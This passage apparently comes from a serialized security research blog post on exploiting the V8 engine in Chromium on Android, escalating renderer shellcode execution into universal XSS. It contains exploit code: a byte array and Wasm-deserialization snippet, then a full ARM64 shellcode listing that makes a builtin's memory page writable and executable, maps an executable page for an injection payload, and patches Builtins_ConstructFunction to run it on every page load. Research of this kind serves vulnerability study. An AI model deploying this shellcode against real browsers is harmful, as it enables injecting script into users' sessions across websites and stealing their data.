,7248,7252,7256,7260,7264,7268,7272,7276],{"type":27,"tag":207,"props":7062,"children":7063},{"style":232},[7064],{"type":33,"value":7065}," 255",{"type":27,"tag":207,"props":7067,"children":7068},{"style":238},[7069],{"type":33,"value":1123},{"type":27,"tag":207,"props":7071,"children":7072},{"style":232},[7073],{"type":33,"value":6863},{"type":27,"tag":207,"props":7075,"children":7076},{"style":238},[7077],{"type":33,"value":1123},{"type":27,"tag":207,"props":7079,"children":7080},{"style":232},[7081],{"type":33,"value":1735},{"type":27,"tag":207,"props":7083,"children":7084},{"style":238},[7085],{"type":33,"value":1123},{"type":27,"tag":207,"props":7087,"children":7088},{"style":232},[7089],{"type":33,"value":6812},{"type":27,"tag":207,"props":7091,"children":7092},{"style":238},[7093],{"type":33,"value":1123},{"type":27,"tag":207,"props":7095,"children":7096},{"style":232},[7097],{"type":33,"value":2711},{"type":27,"tag":207,"props":7099,"children":7100},{"style":238},[7101],{"type":33,"value":1123},{"type":27,"tag":207,"props":7103,"children":7104},{"style":232},[7105],{"type":33,"value":1735},{"type":27,"tag":207,"props":7107,"children":7108},{"style":238},[7109],{"type":33,"value":1123},{"type":27,"tag":207,"props":7111,"children":7112},{"style":232},[7113],{"type":33,"value":6786},{"type":27,"tag":207,"props":7115,"children":7116},{"style":238},[7117],{"type":33,"value":1123},{"type":27,"tag":207,"props":7119,"children":7120},{"style":232},[7121],{"type":33,"value":7122},"214",{"type":27,"tag":207,"props":7124,"children":7125},{"style":238},[7126],{"type":33,"value":1123},{"type":27,"tag":207,"props":7128,"children":7129},{"style":232},[7130],{"type":33,"value":3660},{"type":27,"tag":207,"props":7132,"children":7133},{"style":238},[7134],{"type":33,"value":1123},{"type":27,"tag":207,"props":7136,"children":7137},{"style":232},[7138],{"type":33,"value":7139},"32",{"type":27,"tag":207,"props":7141,"children":7142},{"style":238},[7143],{"type":33,"value":1123},{"type":27,"tag":207,"props":7145,"children":7146},{"style":232},[7147],{"type":33,"value":1735},{"type":27,"tag":207,"props":7149,"children":7150},{"style":238},[7151],{"type":33,"value":1123},{"type":27,"tag":207,"props":7153,"children":7154},{"style":232},[7155],{"type":33,"value":6812},{"type":27,"tag":207,"props":7157,"children":7158},{"style":238},[7159],{"type":33,"value":1123},{"type":27,"tag":207,"props":7161,"children":7162},{"style":232},[7163],{"type":33,"value":1693},{"type":27,"tag":207,"props":7165,"children":7166},{"style":238},[7167],{"type":33,"value":1123},{"type":27,"tag":207,"props":7169,"children":7170},{"style":232},[7171],{"type":33,"value":1660},{"type":27,"tag":207,"props":7173,"children":7174},{"style":238},[7175],{"type":33,"value":1123},{"type":27,"tag":207,"props":7177,"children":7178},{"style":232},[7179],{"type":33,"value":1660},{"type":27,"tag":207,"props":7181,"children":7182},{"style":238},[7183],{"type":33,"value":1123},{"type":27,"tag":207,"props":7185,"children":7186},{"style":232},[7187],{"type":33,"value":1660},{"type":27,"tag":207,"props":7189,"children":7190},{"style":238},[7191],{"type":33,"value":1123},{"type":27,"tag":207,"props":7193,"children":7194},{"style":232},[7195],{"type":33,"value":1660},{"type":27,"tag":207,"props":7197,"children":7198},{"style":238},[7199],{"type":33,"value":1123},{"type":27,"tag":207,"props":7201,"children":7202},{"style":232},[7203],{"type":33,"value":1660},{"type":27,"tag":207,"props":7205,"children":7206},{"style":238},[7207],{"type":33,"value":1123},{"type":27,"tag":207,"props":7209,"children":7210},{"style":232},[7211],{"type":33,"value":1660},{"type":27,"tag":207,"props":7213,"children":7214},{"style":238},[7215],{"type":33,"value":1123},{"type":27,"tag":207,"props":7217,"children":7218},{"style":232},[7219],{"type":33,"value":1660},{"type":27,"tag":207,"props":7221,"children":7222},{"style":238},[7223],{"type":33,"value":1123},{"type":27,"tag":207,"props":7225,"children":7226},{"style":232},[7227],{"type":33,"value":1660},{"type":27,"tag":207,"props":7229,"children":7230},{"style":238},[7231],{"type":33,"value":1123},{"type":27,"tag":207,"props":7233,"children":7234},{"style":232},[7235],{"type":33,"value":1693},{"type":27,"tag":207,"props":7237,"children":7238},{"style":238},[7239],{"type":33,"value":1123},{"type":27,"tag":207,"props":7241,"children":7242},{"style":232},[7243],{"type":33,"value":1660},{"type":27,"tag":207,"props":7245,"children":7246},{"style":238},[7247],{"type":33,"value":1123},{"type":27,"tag":207,"props":7249,"children":7250},{"style":232},[7251],{"type":33,"value":1660},{"type":27,"tag":207,"props":7253,"children":7254},{"style":238},[7255],{"type":33,"value":1123},{"type":27,"tag":207,"props":7257,"children":7258},{"style":232},[7259],{"type":33,"value":1660},{"type":27,"tag":207,"props":7261,"children":7262},{"style":238},[7263],{"type":33,"value":1123},{"type":27,"tag":207,"props":7265,"children":7266},{"style":232},[7267],{"type":33,"value":1660},{"type":27,"tag":207,"props":7269,"children":7270},{"style":238},[7271],{"type":33,"value":1123},{"type":27,"tag":207,"props":7273,"children":7274},{"style":232},[7275],{"type":33,"value":1660},{"type":27,"tag":207,"props":7277,"children":7278},{"style":238},[7279],{"type":33,"value":1842},{"type":27,"tag":207,"props":7281,"children":7282},{"class":209,"line":4095},[7283,7287,7291,7295,7299,7303,7307,7311,7315,7319,7323,7328,7332,7337,7341,7346,7350,7354],{"type":27,"tag":207,"props":7284,"children":7285},{"style":232},[7286],{"type":33,"value":2361},{"type":27,"tag":207,"props":7288,"children":7289},{"style":238},[7290],{"type":33,"value":1123},{"type":27,"tag":207,"props":7292,"children":7293},{"style":232},[7294],{"type":33,"value":1660},{"type":27,"tag":207,"props":7296,"children":7297},{"style":238},[7298],{"type":33,"value":1123},{"type":27,"tag":207,"props":7300,"children":7301},{"style":232},[7302],{"type":33,"value":1660},{"type":27,"tag":207,"props":7304,"children":7305},{"style":238},[7306],{"type":33,"value":1123},{"type":27,"tag":207,"props":7308,"children":7309},{"style":232},[7310],{"type":33,"value":1660},{"type":27,"tag":207,"props":7312,"children":7313},{"style":238},[7314],{"type":33,"value":1123},{"type":27,"tag":207,"props":7316,"children":7317},{"style":232},[7318],{"type":33,"value":1660},{"type":27,"tag":207,"props":7320,"children":7321},{"style":238},[7322],{"type":33,"value":1123},{"type":27,"tag":207,"props":7324,"children":7325},{"style":232},[7326],{"type":33,"value":7327},"92",{"type":27,"tag":207,"props":7329,"children":7330},{"style":238},[7331],{"type":33,"value":1123},{"type":27,"tag":207,"props":7333,"children":7334},{"style":232},[7335],{"type":33,"value":7336},"50",{"type":27,"tag":207,"props":7338,"children":7339},{"style":238},[7340],{"type":33,"value":1123},{"type":27,"tag":207,"props":7342,"children":7343},{"style":232},[7344],{"type":33,"value":7345},"162",{"type":27,"tag":207,"props":7347,"children":7348},{"style":238},[7349],{"type":33,"value":1123},{"type":27,"tag":207,"props":7351,"children":7352},{"style":232},[7353],{"type":33,"value":1660},{"type":27,"tag":207,"props":7355,"children":7356},{"style":238},[7357],{"type":33,"value":1842},{"type":27,"tag":207,"props":7359,"children":7360},{"class":209,"line":4103},[7361],{"type":27,"tag":207,"props":7362,"children":7363},{"style":238},[7364],{"type":33,"value":2648},{"type":27,"tag":207,"props":7366,"children":7367},{"class":209,"line":4154},[7368,7372,7376,7380,7384,7388,7392,7396,7400,7404,7408],{"type":27,"tag":207,"props":7369,"children":7370},{"style":214},[7371],{"type":33,"value":425},{"type":27,"tag":207,"props":7373,"children":7374},{"style":220},[7375],{"type":33,"value":4113},{"type":27,"tag":207,"props":7377,"children":7378},{"style":226},[7379],{"type":33,"value":229},{"type":27,"tag":207,"props":7381,"children":7382},{"style":1335},[7383],{"type":33,"value":4122},{"type":27,"tag":207,"props":7385,"children":7386},{"style":238},[7387],{"type":33,"value":1343},{"type":27,"tag":207,"props":7389,"children":7390},{"style":220},[7391],{"type":33,"value":1962},{"type":27,"tag":207,"props":7393,"children":7394},{"style":238},[7395],{"type":33,"value":1123},{"type":27,"tag":207,"props":7397,"children":7398},{"style":220},[7399],{"type":33,"value":4139},{"type":27,"tag":207,"props":7401,"children":7402},{"style":238},[7403],{"type":33,"value":1041},{"type":27,"tag":207,"props":7405,"children":7406},{"style":220},[7407],{"type":33,"value":4139},{"type":27,"tag":207,"props":7409,"children":7410},{"style":238},[7411],{"type":33,"value":1455},{"type":27,"tag":207,"props":7413,"children":7414},{"class":209,"line":4203},[7415,7419,7423,7427,7431,7435,7439,7443,7447,7451],{"type":27,"tag":207,"props":7416,"children":7417},{"style":220},[7418],{"type":33,"value":4160},{"type":27,"tag":207,"props":7420,"children":7421},{"style":226},[7422],{"type":33,"value":229},{"type":27,"tag":207,"props":7424,"children":7425},{"style":238},[7426],{"type":33,"value":686},{"type":27,"tag":207,"props":7428,"children":7429},{"style":376},[7430],{"type":33,"value":4173},{"type":27,"tag":207,"props":7432,"children":7433},{"style":220},[7434],{"type":33,"value":4113},{"type":27,"tag":207,"props":7436,"children":7437},{"style":238},[7438],{"type":33,"value":1041},{"type":27,"tag":207,"props":7440,"children":7441},{"style":1335},[7442],{"type":33,"value":4186},{"type":27,"tag":207,"props":7444,"children":7445},{"style":238},[7446],{"type":33,"value":4191},{"type":27,"tag":207,"props":7448,"children":7449},{"style":220},[7450],{"type":33,"value":4196},{"type":27,"tag":207,"props":7452,"children":7453},{"style":238},[7454],{"type":33,"value":241},{"type":27,"tag":207,"props":7456,"children":7457},{"class":209,"line":4249},[7458,7462,7466,7470,7474,7479,7483,7487],{"type":27,"tag":207,"props":7459,"children":7460},{"style":220},[7461],{"type":33,"value":1432},{"type":27,"tag":207,"props":7463,"children":7464},{"style":238},[7465],{"type":33,"value":1041},{"type":27,"tag":207,"props":7467,"children":7468},{"style":1335},[7469],{"type":33,"value":1441},{"type":27,"tag":207,"props":7471,"children":7472},{"style":238},[7473],{"type":33,"value":1343},{"type":27,"tag":207,"props":7475,"children":7476},{"style":1325},[7477],{"type":33,"value":7478},"'DeserializeWasmModule result: '",{"type":27,"tag":207,"props":7480,"children":7481},{"style":226},[7482],{"type":33,"value":1374},{"type":27,"tag":207,"props":7484,"children":7485},{"style":220},[7486],{"type":33,"value":2140},{"type":27,"tag":207,"props":7488,"children":7489},{"style":238},[7490],{"type":33,"value":1455},{"type":27,"tag":207,"props":7492,"children":7493},{"class":209,"line":4290},[7494,7498,7502,7506,7510,7514,7518,7522,7526,7530],{"type":27,"tag":207,"props":7495,"children":7496},{"style":214},[7497],{"type":33,"value":2333},{"type":27,"tag":207,"props":7499,"children":7500},{"style":220},[7501],{"type":33,"value":4213},{"type":27,"tag":207,"props":7503,"children":7504},{"style":226},[7505],{"type":33,"value":229},{"type":27,"tag":207,"props":7507,"children":7508},{"style":214},[7509],{"type":33,"value":1597},{"type":27,"tag":207,"props":7511,"children":7512},{"style":220},[7513],{"type":33,"value":1944},{"type":27,"tag":207,"props":7515,"children":7516},{"style":238},[7517],{"type":33,"value":1041},{"type":27,"tag":207,"props":7519,"children":7520},{"style":1335},[7521],{"type":33,"value":1999},{"type":27,"tag":207,"props":7523,"children":7524},{"style":238},[7525],{"type":33,"value":1343},{"type":27,"tag":207,"props":7527,"children":7528},{"style":220},[7529],{"type":33,"value":4242},{"type":27,"tag":207,"props":7531,"children":7532},{"style":238},[7533],{"type":33,"value":1455},{"type":27,"tag":207,"props":7535,"children":7536},{"class":209,"line":4304},[7537,7541,7545,7549,7553,7557,7561,7565,7569],{"type":27,"tag":207,"props":7538,"children":7539},{"style":214},[7540],{"type":33,"value":2333},{"type":27,"tag":207,"props":7542,"children":7543},{"style":220},[7544],{"type":33,"value":4259},{"type":27,"tag":207,"props":7546,"children":7547},{"style":226},[7548],{"type":33,"value":229},{"type":27,"tag":207,"props":7550,"children":7551},{"style":220},[7552],{"type":33,"value":4213},{"type":27,"tag":207,"props":7554,"children":7555},{"style":238},[7556],{"type":33,"value":1041},{"type":27,"tag":207,"props":7558,"children":7559},{"style":220},[7560],{"type":33,"value":2041},{"type":27,"tag":207,"props":7562,"children":7563},{"style":238},[7564],{"type":33,"value":1041},{"type":27,"tag":207,"props":7566,"children":7567},{"style":220},[7568],{"type":33,"value":2050},{"type":27,"tag":207,"props":7570,"children":7571},{"style":238},[7572],{"type":33,"value":241},{"type":27,"tag":207,"props":7574,"children":7575},{"class":209,"line":5466},[7576,7580,7584,7588,7592,7597],{"type":27,"tag":207,"props":7577,"children":7578},{"style":220},[7579],{"type":33,"value":1432},{"type":27,"tag":207,"props":7581,"children":7582},{"style":238},[7583],{"type":33,"value":1041},{"type":27,"tag":207,"props":7585,"children":7586},{"style":1335},[7587],{"type":33,"value":1441},{"type":27,"tag":207,"props":7589,"children":7590},{"style":238},[7591],{"type":33,"value":1343},{"type":27,"tag":207,"props":7593,"children":7594},{"style":220},[7595],{"type":33,"value":7596},"f",{"type":27,"tag":207,"props":7598,"children":7599},{"style":238},[7600],{"type":33,"value":1455},{"type":27,"tag":207,"props":7602,"children":7603},{"class":209,"line":5530},[7604],{"type":27,"tag":207,"props":7605,"children":7606},{"style":238},[7607],{"type":33,"value":4310},{"type":27,"tag":36,"props":7609,"children":7610},{},[7611],{"type":33,"value":7612},"And this time, it works as expected:",{"type":27,"tag":36,"props":7614,"children":7615},{},[7616],{"type":27,"tag":126,"props":7617,"children":7620},{"alt":7618,"src":7619},"image3","/posts/mobile-renderer-rce/image3.png",[],{"type":27,"tag":58,"props":7622,"children":7624},{"id":7623},"achieving-universal-xss",[7625],{"type":33,"value":7626},"Achieving Universal XSS",{"type":27,"tag":36,"props":7628,"children":7629},{},[7630,7632,7639,7641,7648],{"type":33,"value":7631},"At this point, we have arbitrary shellcode execution in the renderer process. While usually the exploit stops here and further access would require a browser sandbox escape, we decided to explore an alternative route known as UXSS, inspired by this ",{"type":27,"tag":47,"props":7633,"children":7636},{"href":7634,"rel":7635},"https://i.blackhat.com/Asia-24/Presentations/Asia-24-Liu-The-Hole-in-Sandbox.pdf",[51],[7637],{"type":33,"value":7638},"talk",{"type":33,"value":7640}," from Tencent Security and ",{"type":27,"tag":47,"props":7642,"children":7645},{"href":7643,"rel":7644},"https://www.interruptlabs.co.uk/articles/one-click-memory-corruption-in-alibabas-uc-browser-exploiting-patch-gap-v8-vulnerabilities-to-steal-your-data",[51],[7646],{"type":33,"value":7647},"research article",{"type":33,"value":7649}," from InterruptLabs.",{"type":27,"tag":36,"props":7651,"children":7652},{},[7653,7655,7662],{"type":33,"value":7654},"Unlike a normal XSS, a UXSS, or universal XSS, is a client side browser exploit that enables arbitrary JavaScript injection in all pages of a website. Normally, site isolation on desktop Chromium prevents this, as each site ends up in a different renderer process, but Android specifically has a ",{"type":27,"tag":47,"props":7656,"children":7659},{"href":7657,"rel":7658},"https://www.chromium.org/Home/chromium-security/site-isolation/#android",[51],[7660],{"type":33,"value":7661},"weaker version",{"type":33,"value":7663}," of this mitigation - only sites with logins and COOP headers are per process isolated. This means that the majority of webpages are in the same renderer process, so any patches to the interpreter will affect them all and lead to UXSS. This is still quite the capability!",{"type":27,"tag":36,"props":7665,"children":7666},{},[7667,7669,7675],{"type":33,"value":7668},"To achieve UXSS, we need to patch a function that’s invoked during site loading so we can run our XSS payload. During debugging, we observed that every site we visited eventually called ",{"type":27,"tag":84,"props":7670,"children":7672},{"className":7671},[],[7673],{"type":33,"value":7674},"Builtins_ConstructFunction",{"type":33,"value":7676},", making it a natural target.",{"type":27,"tag":36,"props":7678,"children":7679},{},[7680,7682,7687],{"type":33,"value":7681},"Our goal is for ",{"type":27,"tag":84,"props":7683,"children":7685},{"className":7684},[],[7686],{"type":33,"value":7674},{"type":33,"value":7688}," to execute our XSS payload first, then continue its normal behavior. To do this, we hook it as follows:",{"type":27,"tag":1228,"props":7690,"children":7691},{},[7692,7697,7707],{"type":27,"tag":1232,"props":7693,"children":7694},{},[7695],{"type":33,"value":7696},"The exploit’s shellcode patches the first few instructions to redirect execution to our mmap-ed shellcode, which runs the XSS payload",{"type":27,"tag":1232,"props":7698,"children":7699},{},[7700,7702],{"type":33,"value":7701},"After finishing, the mmap-ed shellcode restores the original instructions in ",{"type":27,"tag":84,"props":7703,"children":7705},{"className":7704},[],[7706],{"type":33,"value":7674},{"type":27,"tag":1232,"props":7708,"children":7709},{},[7710,7712,7717],{"type":33,"value":7711},"The mmap-ed shellcode then returns to the beginning of ",{"type":27,"tag":84,"props":7713,"children":7715},{"className":7714},[],[7716],{"type":33,"value":7674},{"type":33,"value":7718},", which now proceeds normally",{"type":27,"tag":36,"props":7720,"children":7721},{},[7722],{"type":33,"value":7723},"The ARM64 shellcode implementing this looks as follows:",{"type":27,"tag":101,"props":7725,"children":7729},{"code":7726,"language":7727,"meta":7,"className":7728,"style":7},"// get return addr to x0\nldr x0, [sp, #0x18]\n// strip pac signature from return address\n.arch armv8.3-a; xpaci x0\n\n// store x5 = Builtins_ConstructFunction\nmovz x1, #0x610c\nsub x0, x0, x1\nmov x5, x0\n\n// store x4 = page aligned ConstructFunction\nmovz x1, #0xf000\nmovk x1, #0xffff, lsl #16\nmovk x1, #0xffff, lsl #32\nand x4, x5, x1\n\n// mprotect page aligned ConstructFunction RWX\nmov x0, x4\nmov x1, #0x2000\nmov x2, #0x7\nmov x8, #226\nsvc #0\n\nmov x6, x5\n\n// mmap RWX for jump dest (uxss_sc)\nmov x0, #0\nmov x1, #0x1000\nmov x2, #0x7\nmov x3, #34\nmov x4, #-1\nmov x5, #0\nmov x8, #222\nsvc #0\n\nmov x5, x0\n\n// at this point:\n// x6 = Builtins_ConstructFunction\n// x5 = mmap page for uxss_sc\n\n// write uxss_sc to mmaped rwx page\n{write_sc(uxss_sc, \"x5\")}\n\n// wipe from cache\nmov x0, x5\n{WIPE_CACHE}\n\n// patch Builtins_ConstructFunction\n{write_sc(new_compile_instrs, \"x6\")}\n// and add a pointer to uxss_sc just above new instructions\nstr x5, [x6, #{5 * INSTR_SIZE}]\n\n// wipe from cache\nmov x0, x6\n{WIPE_CACHE}\n","asm","language-asm shiki shiki-themes slack-dark",[7730],{"type":27,"tag":84,"props":7731,"children":7732},{"__ignoreMap":7},[7733,7741,7749,7757,7765,7772,7780,7788,7796,7804,7811,7819,7827,7835,7843,7851,7858,7866,7874,7882,7890,7898,7907,7915,7924,7932,7941,7950,7959,7967,7976,7985,7994,8003,8011,8019,8027,8035,8044,8053,8062,8070,8079,8088,8096,8105,8114,8123,8131,8140,8149,8158,8167,8175,8183,8192],{"type":27,"tag":207,"props":7734,"children":7735},{"class":209,"line":210},[7736],{"type":27,"tag":207,"props":7737,"children":7738},{},[7739],{"type":33,"value":7740},"// get return addr to x0\n",{"type":27,"tag":207,"props":7742,"children":7743},{"class":209,"line":244},[7744],{"type":27,"tag":207,"props":7745,"children":7746},{},[7747],{"type":33,"value":7748},"ldr x0, [sp, #0x18]\n",{"type":27,"tag":207,"props":7750,"children":7751},{"class":209,"line":270},[7752],{"type":27,"tag":207,"props":7753,"children":7754},{},[7755],{"type":33,"value":7756},"// strip pac signature from return address\n",{"type":27,"tag":207,"props":7758,"children":7759},{"class":209,"line":296},[7760],{"type":27,"tag":207,"props":7761,"children":7762},{},[7763],{"type":33,"value":7764},".arch armv8.3-a; xpaci x0\n",{"type":27,"tag":207,"props":7766,"children":7767},{"class":209,"line":445},[7768],{"type":27,"tag":207,"props":7769,"children":7770},{"emptyLinePlaceholder":19},[7771],{"type":33,"value":2062},{"type":27,"tag":207,"props":7773,"children":7774},{"class":209,"line":867},[7775],{"type":27,"tag":207,"props":7776,"children":7777},{},[7778],{"type":33,"value":7779},"// store x5 = Builtins_ConstructFunction\n",{"type":27,"tag":207,"props":7781,"children":7782},{"class":209,"line":892},[7783],{"type":27,"tag":207,"props":7784,"children":7785},{},[7786],{"type":33,"value":7787},"movz x1, #0x610c\n",{"type":27,"tag":207,"props":7789,"children":7790},{"class":209,"line":1475},[7791],{"type":27,"tag":207,"props":7792,"children":7793},{},[7794],{"type":33,"value":7795},"sub x0, x0, x1\n",{"type":27,"tag":207,"props":7797,"children":7798},{"class":209,"line":2065},[7799],{"type":27,"tag":207,"props":7800,"children":7801},{},[7802],{"type":33,"value":7803},"mov x5, x0\n",{"type":27,"tag":207,"props":7805,"children":7806},{"class":209,"line":2092},[7807],{"type":27,"tag":207,"props":7808,"children":7809},{"emptyLinePlaceholder":19},[7810],{"type":33,"value":2062},{"type":27,"tag":207,"props":7812,"children":7813},{"class":209,"line":2130},[7814],{"type":27,"tag":207,"props":7815,"children":7816},{},[7817],{"type":33,"value":7818},"// store x4 = page aligned ConstructFunction\n",{"type":27,"tag":207,"props":7820,"children":7821},{"class":209,"line":2168},[7822],{"type":27,"tag":207,"props":7823,"children":7824},{},[7825],{"type":33,"value":7826},"movz x1, #0xf000\n",{"type":27,"tag":207,"props":7828,"children":7829},{"class":209,"line":4095},[7830],{"type":27,"tag":207,"props":7831,"children":7832},{},[7833],{"type":33,"value":7834},"movk x1, #0xffff, lsl #16\n",{"type":27,"tag":207,"props":7836,"children":7837},{"class":209,"line":4103},[7838],{"type":27,"tag":207,"props":7839,"children":7840},{},[7841],{"type":33,"value":7842},"movk x1, #0xffff, lsl #32\n",{"type":27,"tag":207,"props":7844,"children":7845},{"class":209,"line":4154},[7846],{"type":27,"tag":207,"props":7847,"children":7848},{},[7849],{"type":33,"value":7850},"and x4, x5, x1\n",{"type":27,"tag":207,"props":7852,"children":7853},{"class":209,"line":4203},[7854],{"type":27,"tag":207,"props":7855,"children":7856},{"emptyLinePlaceholder":19},[7857],{"type":33,"value":2062},{"type":27,"tag":207,"props":7859,"children":7860},{"class":209,"line":4249},[7861],{"type":27,"tag":207,"props":7862,"children":7863},{},[7864],{"type":33,"value":7865},"// mprotect page aligned ConstructFunction RWX\n",{"type":27,"tag":207,"props":7867,"children":7868},{"class":209,"line":4290},[7869],{"type":27,"tag":207,"props":7870,"children":7871},{},[7872],{"type":33,"value":7873},"mov x0, x4\n",{"type":27,"tag":207,"props":7875,"children":7876},{"class":209,"line":4304},[7877],{"type":27,"tag":207,"props":7878,"children":7879},{},[7880],{"type":33,"value":7881},"mov x1, #0x2000\n",{"type":27,"tag":207,"props":7883,"children":7884},{"class":209,"line":5466},[7885],{"type":27,"tag":207,"props":7886,"children":7887},{},[7888],{"type":33,"value":7889},"mov x2, #0x7\n",{"type":27,"tag":207,"props":7891,"children":7892},{"class":209,"line":5530},[7893],{"type":27,"tag":207,"props":7894,"children":7895},{},[7896],{"type":33,"value":7897},"mov x8, #226\n",{"type":27,"tag":207,"props":7899,"children":7901},{"class":209,"line":7900},22,[7902],{"type":27,"tag":207,"props":7903,"children":7904},{},[7905],{"type":33,"value":7906},"svc #0\n",{"type":27,"tag":207,"props":7908,"children":7910},{"class":209,"line":7909},23,[7911],{"type":27,"tag":207,"props":7912,"children":7913},{"emptyLinePlaceholder":19},[7914],{"type":33,"value":2062},{"type":27,"tag":207,"props":7916,"children":7918},{"class":209,"line":7917},24,[7919],{"type":27,"tag":207,"props":7920,"children":7921},{},[7922],{"type":33,"value":7923},"mov x6, x5\n",{"type":27,"tag":207,"props":7925,"children":7927},{"class":209,"line":7926},25,[7928],{"type":27,"tag":207,"props":7929,"children":7930},{"emptyLinePlaceholder":19},[7931],{"type":33,"value":2062},{"type":27,"tag":207,"props":7933,"children":7935},{"class":209,"line":7934},26,[7936],{"type":27,"tag":207,"props":7937,"children":7938},{},[7939],{"type":33,"value":7940},"// mmap RWX for jump dest (uxss_sc)\n",{"type":27,"tag":207,"props":7942,"children":7944},{"class":209,"line":7943},27,[7945],{"type":27,"tag":207,"props":7946,"children":7947},{},[7948],{"type":33,"value":7949},"mov x0, #0\n",{"type":27,"tag":207,"props":7951,"children":7953},{"class":209,"line":7952},28,[7954],{"type":27,"tag":207,"props":7955,"children":7956},{},[7957],{"type":33,"value":7958},"mov x1, #0x1000\n",{"type":27,"tag":207,"props":7960,"children":7962},{"class":209,"line":7961},29,[7963],{"type":27,"tag":207,"props":7964,"children":7965},{},[7966],{"type":33,"value":7889},{"type":27,"tag":207,"props":7968,"children":7970},{"class":209,"line":7969},30,[7971],{"type":27,"tag":207,"props":7972,"children":7973},{},[7974],{"type":33,"value":7975},"mov x3, #34\n",{"type":27,"tag":207,"props":7977,"children":7979},{"class":209,"line":7978},31,[7980],{"type":27,"tag":207,"props":7981,"children":7982},{},[7983],{"type":33,"value":7984},"mov x4, #-1\n",{"type":27,"tag":207,"props":7986,"children":7988},{"class":209,"line":7987},32,[7989],{"type":27,"tag":207,"props":7990,"children":7991},{},[7992],{"type":33,"value":7993},"mov x5, #0\n",{"type":27,"tag":207,"props":7995,"children":7997},{"class":209,"line":7996},33,[7998],{"type":27,"tag":207,"props":7999,"children":8000},{},[8001],{"type":33,"value":8002},"mov x8, #222\n",{"type":27,"tag":207,"props":8004,"children":8006},{"class":209,"line":8005},34,[8007],{"type":27,"tag":207,"props":8008,"children":8009},{},[8010],{"type":33,"value":7906},{"type":27,"tag":207,"props":8012,"children":8014},{"class":209,"line":8013},35,[8015],{"type":27,"tag":207,"props":8016,"children":8017},{"emptyLinePlaceholder":19},[8018],{"type":33,"value":2062},{"type":27,"tag":207,"props":8020,"children":8022},{"class":209,"line":8021},36,[8023],{"type":27,"tag":207,"props":8024,"children":8025},{},[8026],{"type":33,"value":7803},{"type":27,"tag":207,"props":8028,"children":8030},{"class":209,"line":8029},37,[8031],{"type":27,"tag":207,"props":8032,"children":8033},{"emptyLinePlaceholder":19},[8034],{"type":33,"value":2062},{"type":27,"tag":207,"props":8036,"children":8038},{"class":209,"line":8037},38,[8039],{"type":27,"tag":207,"props":8040,"children":8041},{},[8042],{"type":33,"value":8043},"// at this point:\n",{"type":27,"tag":207,"props":8045,"children":8047},{"class":209,"line":8046},39,[8048],{"type":27,"tag":207,"props":8049,"children":8050},{},[8051],{"type":33,"value":8052},"// x6 = Builtins_ConstructFunction\n",{"type":27,"tag":207,"props":8054,"children":8056},{"class":209,"line":8055},40,[8057],{"type":27,"tag":207,"props":8058,"children":8059},{},[8060],{"type":33,"value":8061},"// x5 = mmap page for uxss_sc\n",{"type":27,"tag":207,"props":8063,"children":8065},{"class":209,"line":8064},41,[8066],{"type":27,"tag":207,"props":8067,"children":8068},{"emptyLinePlaceholder":19},[8069],{"type":33,"value":2062},{"type":27,"tag":207,"props":8071,"children":8073},{"class":209,"line":8072},42,[8074],{"type":27,"tag":207,"props":8075,"children":8076},{},[8077],{"type":33,"value":8078},"// write uxss_sc to mmaped rwx page\n",{"type":27,"tag":207,"props":8080,"children":8082},{"class":209,"line":8081},43,[8083],{"type":27,"tag":207,"props":8084,"children":8085},{},[8086],{"type":33,"value":8087},"{write_sc(uxss_sc, \"x5\")}\n",{"type":27,"tag":207,"props":8089,"children":8091},{"class":209,"line":8090},44,[8092],{"type":27,"tag":207,"props":8093,"children":8094},{"emptyLinePlaceholder":19},[8095],{"type":33,"value":2062},{"type":27,"tag":207,"props":8097,"children":8099},{"class":209,"line":8098},45,[8100],{"type":27,"tag":207,"props":8101,"children":8102},{},[8103],{"type":33,"value":8104},"// wipe from cache\n",{"type":27,"tag":207,"props":8106,"children":8108},{"class":209,"line":8107},46,[8109],{"type":27,"tag":207,"props":8110,"children":8111},{},[8112],{"type":33,"value":8113},"mov x0, x5\n",{"type":27,"tag":207,"props":8115,"children":8117},{"class":209,"line":8116},47,[8118],{"type":27,"tag":207,"props":8119,"children":8120},{},[8121],{"type":33,"value":8122},"{WIPE_CACHE}\n",{"type":27,"tag":207,"props":8124,"children":8126},{"class":209,"line":8125},48,[8127],{"type":27,"tag":207,"props":8128,"children":8129},{"emptyLinePlaceholder":19},[8130],{"type":33,"value":2062},{"type":27,"tag":207,"props":8132,"children":8134},{"class":209,"line":8133},49,[8135],{"type":27,"tag":207,"props":8136,"children":8137},{},[8138],{"type":33,"value":8139},"// patch Builtins_ConstructFunction\n",{"type":27,"tag":207,"props":8141,"children":8143},{"class":209,"line":8142},50,[8144],{"type":27,"tag":207,"props":8145,"children":8146},{},[8147],{"type":33,"value":8148},"{write_sc(new_compile_instrs, \"x6\")}\n",{"type":27,"tag":207,"props":8150,"children":8152},{"class":209,"line":8151},51,[8153],{"type":27,"tag":207,"props":8154,"children":8155},{},[8156],{"type":33,"value":8157},"// and add a pointer to uxss_sc just above new instructions\n",{"type":27,"tag":207,"props":8159,"children":8161},{"class":209,"line":8160},52,[8162],{"type":27,"tag":207,"props":8163,"children":8164},{},[8165],{"type":33,"value":8166},"str x5, [x6, #{5 * INSTR_SIZE}]\n",{"type":27,"tag":207,"props":8168,"children":8170},{"class":209,"line":8169},53,[8171],{"type":27,"tag":207,"props":8172,"children":8173},{"emptyLinePlaceholder":19},[8174],{"type":33,"value":2062},{"type":27,"tag":207,"props":8176,"children":8178},{"class":209,"line":8177},54,[8179],{"type":27,"tag":207,"props":8180,"children":8181},{},[8182],{"type":33,"value":8104},{"type":27,"tag":207,"props":8184,"children":8186},{"class":209,"line":8185},55,[8187],{"type":27,"tag":207,"props":8188,"children":8189},{},[8190],{"type":33,"value":8191},"mov x0, x6\n",{"type":27,"tag":207,"props":8193,"children":8195},{"class":209,"line":8194},56,[8196],{"type":27,"tag":207,"props":8197,"children":8198},{},[8199],{"type":33,"value":8122},{"type":27,"tag":36,"props":8201,"children":8202},{},[8203,8205,8211,8213,8218,8220,8226],{"type":33,"value":8204},"In the snippet above, ",{"type":27,"tag":84,"props":8206,"children":8208},{"className":8207},[],[8209],{"type":33,"value":8210},"new_compile_instrs",{"type":33,"value":8212}," refers to the instructions written to the beginning of ",{"type":27,"tag":84,"props":8214,"children":8216},{"className":8215},[],[8217],{"type":33,"value":7674},{"type":33,"value":8219}," that invoke the ",{"type":27,"tag":84,"props":8221,"children":8223},{"className":8222},[],[8224],{"type":33,"value":8225},"uxss_sc",{"type":33,"value":8227}," mmap-ed 